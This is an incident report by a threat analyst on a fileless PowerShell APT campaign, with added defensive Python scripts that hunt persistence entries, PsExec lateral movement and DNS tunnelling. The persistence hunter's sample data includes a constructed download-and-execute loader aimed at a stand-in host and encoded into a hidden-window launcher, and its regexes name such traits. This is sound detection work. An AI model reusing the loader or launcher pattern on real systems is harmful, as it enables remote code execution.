Nina Kovacs — Exploit Research Analyst
Key Takeaways
- Custom fileless malware: a PowerShell payload that ran in memory and persisted through a scheduled task and an HKCU Run key.
- Indicators of Compromise (IOCs) point to targeted intrusions against government entities.
- Layered C2 infrastructure: traffic on TCP port 443 that blended with HTTPS plus a DNS-tunnelling channel, behind a domain registered with fabricated details.
Executive Summary
Our investigation into a recent advanced persistent threat (APT) campaign found fileless malware crafted to evade traditional, file-based detection. The actor targeted several government agencies, using social engineering to deliver a payload that ran only in memory. Through forensic analysis we traced the actor's steps and documented their tactics, techniques, and procedures (TTPs) across the stages of the attack lifecycle.
Initial Access
The attack chain began with a phishing email sent to multiple government employees, carrying a lure tailored to their roles. Clicking the embedded link redirected the victim to an exploit kit that delivered a custom PowerShell script. Analysis of the email headers and sending domain showed a look-alike domain spoofing a legitimate communication channel, which raised the success rate of the social-engineering step. Header analysis (the Received chain and the SPF, DKIM and DMARC results) is the first check to run on such mail: a look-alike domain typically passes authentication for itself while failing to match the domain it imitates.
Execution & Persistence
Once the actor achieved initial access, the malicious PowerShell script executed in memory, never writing the payload to disk. The script used built-in Windows utilities to establish persistence: it registered a scheduled task (its XML definition sits under C:\Windows\System32\Tasks\) configured to launch the PowerShell loader at system startup, and it added a value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, which re-launches the loader at each logon of the compromised user. "Fileless" applies to the payload only: the task XML and the Run-key value are on-disk artifacts, and they are the most reliable hooks for detecting this persistence.
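The two persistence artifacts above are what a hunt should enumerate. The following is an added example (not code from the original report): it parses Task Scheduler XML definitions and Run-key values, decodes any -EncodedCommand blob, and flags PowerShell launchers with the traits of an in-memory loader. The task names, the Run-key values, the loader string and the cdn-sync.invalid host are constructed for the example; on a live host you would feed it the files under C:\Windows\System32\Tasks and the values of the HKCU Run key.

```python
"""Hunt for PowerShell persistence in Task Scheduler XML and Run-key values.

Added example, not from the original report. SAMPLE_TASKS and SAMPLE_RUN_VALUES
are constructed. On a live host, read the XML files under
C:\\Windows\\System32\\Tasks in binary mode (they are UTF-16 with a BOM, which
ElementTree handles) and export the values of
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.
"""
import base64
import re
import xml.etree.ElementTree as ET

# Namespace used by every task definition file on disk.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Launcher traits typical of in-memory PowerShell loaders.
SUSPICIOUS = [
    (re.compile(r"(?i)-(encodedcommand|enc|ec|e)\b"), "encoded command"),
    (re.compile(r"(?i)-w(indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)-nop(rofile)?\b"), "no profile"),
    (re.compile(r"(?i)\biex\b|invoke-expression"), "invoke-expression"),
    (re.compile(r"(?i)downloadstring|invoke-webrequest|net\.webclient"), "remote download"),
    (re.compile(r"(?i)frombase64string"), "base64 decode"),
]
ENCODED_RE = re.compile(r"(?i)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE) decoded, else None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed blob: still worth a look, but not decodable here


def score_command(cmdline):
    """Suspicious traits of one launcher command line, decoded payload included.
    Returns [] for anything that is not a PowerShell launcher."""
    if not re.search(r"(?i)\b(powershell|pwsh)(\.exe)?\b", cmdline):
        return []
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text += " " + decoded  # inspect the decoded script as well
    return [label for pattern, label in SUSPICIOUS if pattern.search(text)]


def task_commands(task_xml):
    """'command arguments' for each <Exec> action in a task definition (str or bytes)."""
    root = ET.fromstring(task_xml)
    cmds = []
    for action in root.findall(".//t:Actions/t:Exec", NS):
        cmd = action.findtext("t:Command", default="", namespaces=NS).strip()
        args = action.findtext("t:Arguments", default="", namespaces=NS).strip()
        cmds.append((cmd + " " + args).strip())
    return cmds


def hunt(tasks, run_values):
    """tasks: {task name: xml}; run_values: {value name: command line}.
    Returns {(source, name): [traits]} for every entry that trips a rule."""
    findings = {}
    for name, xml in tasks.items():
        for cmd in task_commands(xml):
            hits = score_command(cmd)
            if hits:
                findings[("scheduled_task", name)] = hits
    for name, cmd in run_values.items():
        hits = score_command(cmd)
        if hits:
            findings[("run_key", name)] = hits
    return findings


# Constructed stage-1 loader, encoded the way an attacker passes it to -enc.
LOADER = "IEX (New-Object Net.WebClient).DownloadString('https://cdn-sync.invalid/s')"
LOADER_B64 = base64.b64encode(LOADER.encode("utf-16-le")).decode()

TASK_TEMPLATE = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>{cmd}</Command><Arguments>{args}</Arguments></Exec></Actions>
</Task>"""

SAMPLE_TASKS = {  # constructed: one loader disguised as maintenance, one real backup job
    "\\Microsoft\\Windows\\Maintenance\\HealthCheck": TASK_TEMPLATE.format(
        cmd="powershell.exe", args="-nop -w hidden -enc " + LOADER_B64),
    "\\Backup\\Nightly": TASK_TEMPLATE.format(
        cmd="powershell.exe", args="-ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1"),
}
SAMPLE_RUN_VALUES = {  # constructed: one legitimate autostart, one inline loader
    "OneDrive": "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background",
    "Updater": "powershell -w hidden -c \"IEX ([Text.Encoding]::Unicode.GetString("
               "[Convert]::FromBase64String('aQBlAHgA')))\"",
}

if __name__ == "__main__":
    for (source, name), traits in hunt(SAMPLE_TASKS, SAMPLE_RUN_VALUES).items():
        print(f"{source:15} {name}: {', '.join(traits)}")
```

The benign backup task and the OneDrive value produce no findings; the loader task trips five rules because the decoded -enc payload is scored too, which is the detail that matters when the visible command line is just a base64 blob.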
Command and Control
Network artifacts showed the implant communicating with a command and control (C2) server over TCP port 443, so that the traffic blended with ordinary HTTPS; the port alone does not prove the protocol, and TLS fingerprinting or decryption is needed to tell a genuine HTTPS session from a custom protocol on 443. The actor also used DNS tunnelling, encapsulating command data in DNS queries to the C2 domain, a channel that passes through controls that inspect only web traffic. The C2 domain was registered with fabricated registrant details, which prevented attribution through registration records.
Lateral Movement & Discovery
Upon gaining a foothold, the actor moved laterally, using tools such as Mimikatz to harvest credentials and PsExec (T1021.002) to execute commands on remote systems. The host and network logs reviewed during incident response showed the actor relying on legitimate administrative tools, which let the activity blend in with normal enterprise operations and evade detection. In the event logs we found commands run under administrator accounts with no legitimate connection to the tasks those accounts normally perform. PsExec also leaves a service-installation record (System log event 7045 for PSEXESVC) on every target it touches, and the account's network logons (Security event 4624, logon type 3) fan out across hosts in quick succession.
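The two traces named above, the 7045 service install and the burst of type-3 logons, are easy to correlate once the events are exported from a SIEM. The following is an added example (not code from the original report) that attributes each PsExec-style service install to the network logon that preceded it and flags accounts that reach many hosts within a short window. The event records, host names, the adm.jsmith account, the IP addresses and the wdsvc service name are constructed for the example; the field names mirror the XML of Windows events 4624 and 7045.

```python
"""Correlate service installs with network logons to surface PsExec-style
lateral movement. Added example, not from the original report. SAMPLE_EVENTS
is constructed, with fields named after those of Security 4624 and System 7045.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

PSEXEC_RE = re.compile(r"(?i)psexesvc")
# A bare executable dropped into the Windows root, the footprint of PsExec -r.
ROOT_EXE_RE = re.compile(r"(?i)^(%SystemRoot%|C:\\Windows)\\[^\\]+\.exe$")
LOGON_WINDOW = timedelta(seconds=60)
FANOUT_WINDOW = timedelta(minutes=10)
FANOUT_THRESHOLD = 3


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def correlate_service_installs(events):
    """For each 7045, find the latest type-3 4624 on the same host within
    LOGON_WINDOW before it, then classify the install."""
    logons = [e for e in events if e["id"] == 4624 and e.get("LogonType") == 3]
    findings = []
    for svc in (e for e in events if e["id"] == 7045):
        t = _ts(svc)
        prior = [l for l in logons
                 if l["host"] == svc["host"] and timedelta(0) <= t - _ts(l) <= LOGON_WINDOW]
        src = max(prior, key=_ts) if prior else None
        name, image = svc.get("ServiceName", ""), svc.get("ImagePath", "")
        if PSEXEC_RE.search(name) or PSEXEC_RE.search(image):
            verdict = "psexec"
        elif src and ROOT_EXE_RE.match(image):
            verdict = "possible renamed psexec"  # -r changes the name, not the pattern
        else:
            continue
        findings.append({
            "host": svc["host"], "service": name, "verdict": verdict,
            "account": src["TargetUserName"] if src else None,
            "source_ip": src["IpAddress"] if src else None,
        })
    return findings


def logon_fanout(events):
    """Accounts with type-3 logons to FANOUT_THRESHOLD or more distinct hosts
    inside FANOUT_WINDOW: the signature of scripted lateral movement."""
    by_account = defaultdict(list)
    for e in events:
        if e["id"] == 4624 and e.get("LogonType") == 3:
            by_account[e["TargetUserName"]].append(e)
    flagged = {}
    for account, evs in by_account.items():
        evs.sort(key=_ts)
        for i, first in enumerate(evs):
            hosts = {x["host"] for x in evs[i:] if _ts(x) - _ts(first) <= FANOUT_WINDOW}
            if len(hosts) >= FANOUT_THRESHOLD:
                flagged[account] = sorted(hosts)
                break
    return flagged


# Constructed sample: one admin account sweeping three hosts at night,
# plus a benign agent install and a normal file-share logon for contrast.
SAMPLE_EVENTS = [
    {"ts": "2024-03-12T02:13:01", "host": "SRV-FILE01", "id": 4624, "LogonType": 3,
     "TargetUserName": "adm.jsmith", "IpAddress": "10.0.5.21"},
    {"ts": "2024-03-12T02:13:05", "host": "SRV-FILE01", "id": 7045,
     "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"ts": "2024-03-12T02:14:02", "host": "SRV-DB02", "id": 4624, "LogonType": 3,
     "TargetUserName": "adm.jsmith", "IpAddress": "10.0.5.21"},
    {"ts": "2024-03-12T02:14:07", "host": "SRV-DB02", "id": 7045,  # PsExec -r wdsvc
     "ServiceName": "wdsvc", "ImagePath": "%SystemRoot%\\wdsvc.exe"},
    {"ts": "2024-03-12T02:15:10", "host": "WS-044", "id": 4624, "LogonType": 3,
     "TargetUserName": "adm.jsmith", "IpAddress": "10.0.5.21"},
    {"ts": "2024-03-12T09:40:00", "host": "WS-044", "id": 7045,  # benign EDR agent
     "ServiceName": "Sense",
     "ImagePath": "C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe"},
    {"ts": "2024-03-12T09:41:00", "host": "SRV-FILE01", "id": 4624, "LogonType": 3,
     "TargetUserName": "m.lee", "IpAddress": "10.0.7.88"},
]

if __name__ == "__main__":
    for f in correlate_service_installs(SAMPLE_EVENTS):
        print(f)
    print(logon_fanout(SAMPLE_EVENTS))
```

The renamed-service rule is deliberately weak on its own (many installers drop an executable into the Windows root) and only fires when a network logon immediately precedes the install, which is why the correlation step comes first.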
Impact & Objectives
The campaign's objective appears to have been data exfiltration from sensitive systems, most likely confidential government documents. Multiple internal repositories had been accessed, with specific queries suggesting retrieval of data on national security topics. Analysis of outbound traffic patterns showed large transfers associated with the compromised accounts, corroborating the intent to exfiltrate valuable intelligence.
MITRE ATT&CK Mapping
- T1566 – Phishing: the initial access vector, via crafted email lures.
- T1059.001 – Command and Scripting Interpreter: PowerShell: in-memory execution and payload delivery.
- T1053.005 – Scheduled Task/Job: Scheduled Task: persistence at system startup.
- T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder: persistence through the HKCU Run key.
- T1003 – OS Credential Dumping: credential harvesting with Mimikatz.
- T1550.002 – Use Alternate Authentication Material: Pass the Hash: lateral movement with stolen credential material (formerly T1075).
- T1021.002 – Remote Services: SMB/Windows Admin Shares: PsExec execution on remote hosts (formerly T1077).
- T1071.004 – Application Layer Protocol: DNS: command delivery over DNS tunnelling.
Detection Opportunities
- Monitor for scheduled tasks created under C:\Windows\System32\Tasks (Security event 4698, or event 106 in the Microsoft-Windows-TaskScheduler/Operational log) and for new values under the HKCU Run key (Sysmon event 13), especially where the action launches powershell.exe with -EncodedCommand, -WindowStyle Hidden or -NoProfile.
- Enable PowerShell script block logging (event 4104 in Microsoft-Windows-PowerShell/Operational): it records the script text as it executes, which is the only durable trace of an in-memory payload.
- Alert on DNS queries to anomalous domains, particularly those with long, high-entropy subdomains that rarely repeat, and on unusually high query volumes to a single domain.
- Employ behavioral analysis to detect unusual network traffic patterns associated with legitimate accounts, including 7045 service installs (PSEXESVC) that follow a network logon and accounts authenticating to many hosts in a short window.
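The DNS-tunnelling channel described under Command and Control is the target of the DNS bullet above. The following is an added example (not code from the original report) that profiles resolver logs per registered domain and flags domains whose subdomains are long, high-entropy and rarely repeated. The log lines, the client address and the domains (under the reserved .invalid and .example TLDs) are constructed for the example; splitting on the last two labels is an assumption that a real deployment would replace with a public-suffix list.

```python
"""Flag DNS-tunnelling candidates in query logs by subdomain entropy, length
and churn. Added example, not from the original report. SAMPLE_LOG is
constructed; its domains use the reserved .invalid and .example TLDs."""
import math
from collections import defaultdict


def shannon_entropy(s):
    """Bits per character: roughly 0-3 for ordinary hostnames, 4-5 for encoded data."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname):
    """(subdomain, registered domain) using the last two labels.
    Assumption: no public-suffix list, so co.uk-style suffixes are mis-split."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_log(text):
    """One record per line: '<timestamp> <client> <qtype> <qname>'."""
    records = []
    for line in text.strip().splitlines():
        ts, client, qtype, qname = line.split()
        records.append({"ts": ts, "client": client, "qtype": qtype, "qname": qname})
    return records


def profile_domains(records):
    """Per registered domain: query count, distinct subdomains, mean subdomain
    entropy and length, and the share of TXT/NULL queries (tunnels favour
    record types that carry arbitrary data back to the client)."""
    agg = defaultdict(lambda: {"n": 0, "subs": set(), "ent": 0.0, "len": 0, "txt": 0})
    for r in records:
        sub, dom = split_qname(r["qname"])
        payload = sub.replace(".", "")  # the label dots carry no information
        a = agg[dom]
        a["n"] += 1
        a["subs"].add(sub)
        a["ent"] += shannon_entropy(payload)
        a["len"] += len(payload)
        a["txt"] += r["qtype"] in ("TXT", "NULL")
    return {dom: {"queries": a["n"],
                  "unique_subdomains": len(a["subs"]),
                  "mean_entropy": a["ent"] / a["n"],
                  "mean_sub_len": a["len"] / a["n"],
                  "txt_ratio": a["txt"] / a["n"]}
            for dom, a in agg.items()}


def flag_tunnels(profiles, min_entropy=3.5, min_len=30, min_unique=5):
    """Candidate tunnels: subdomains that are long, high-entropy and rarely
    repeat. Requiring all three keeps CDN and update hostnames (long, but the
    same name over and over) out of the alert queue."""
    return sorted(dom for dom, p in profiles.items()
                  if p["mean_entropy"] >= min_entropy
                  and p["mean_sub_len"] >= min_len
                  and p["unique_subdomains"] >= min_unique)


# Constructed resolver log: one host beaconing over DNS, plus normal traffic
# and a CDN hostname that is long but never changes.
SAMPLE_LOG = """
2024-03-12T02:20:01 10.0.5.21 A   www.corp.example
2024-03-12T02:20:02 10.0.5.21 A   mail.corp.example
2024-03-12T02:20:03 10.0.5.21 TXT k3j9f8a2m1x7v5b0q4w6z8c1n3p5r7t9.ax2f.telemetry-sync.invalid
2024-03-12T02:20:04 10.0.5.21 A   h7s2d9g4l1y6u0e3o5i8w2r7t4q9p1z6.bk8m.telemetry-sync.invalid
2024-03-12T02:20:05 10.0.5.21 A   a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4.cdn.example
2024-03-12T02:20:06 10.0.5.21 TXT m2n4b6v8c0x1z3a5s7d9f1g3h5j7k9l2.cq1r.telemetry-sync.invalid
2024-03-12T02:20:07 10.0.5.21 A   p9o7i5u3y1t8r6e4w2q0l3k5j7h9g1f3.dz4w.telemetry-sync.invalid
2024-03-12T02:20:08 10.0.5.21 A   intranet.corp.example
2024-03-12T02:20:09 10.0.5.21 A   a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4.cdn.example
2024-03-12T02:20:10 10.0.5.21 TXT z1x3c5v7b9n2m4a6s8d0f1g3h5j7k9l2.ep6t.telemetry-sync.invalid
2024-03-12T02:20:11 10.0.5.21 A   q5w3e1r9t7y5u3i1o9p7a2s4d6f8g0h2.fm9c.telemetry-sync.invalid
2024-03-12T02:20:12 10.0.5.21 A   a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4.cdn.example
2024-03-12T02:20:13 10.0.5.21 A   u8i6o4p2a0s9d7f5g3h1j2k4l6z8x0c1.gn3v.telemetry-sync.invalid
"""

if __name__ == "__main__":
    profiles = profile_domains(parse_log(SAMPLE_LOG))
    for dom, p in profiles.items():
        print(f"{dom:28} q={p['queries']:2} uniq={p['unique_subdomains']:2} "
              f"H={p['mean_entropy']:.2f} len={p['mean_sub_len']:.0f} txt={p['txt_ratio']:.2f}")
    print("flagged:", flag_tunnels(profiles))
```

The cdn.example hostname clears the entropy and length thresholds on its own, which is why entropy alone produces noisy alerts; it is the subdomain churn, seven queries with seven different payload labels, that separates the tunnel from the CDN.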
Analyst Notes
This case is a reminder of the evolving sophistication of APT actors and their continued focus on operational security. The combination of fileless malware with legitimate administrative tools calls for deeper inspection capabilities within security operations, in particular script block logging and registry and task auditing on endpoints. We recommend revisiting email filtering rules and enhancing endpoint detection and logging to counter similar tactics in future campaigns.
Source: Original Report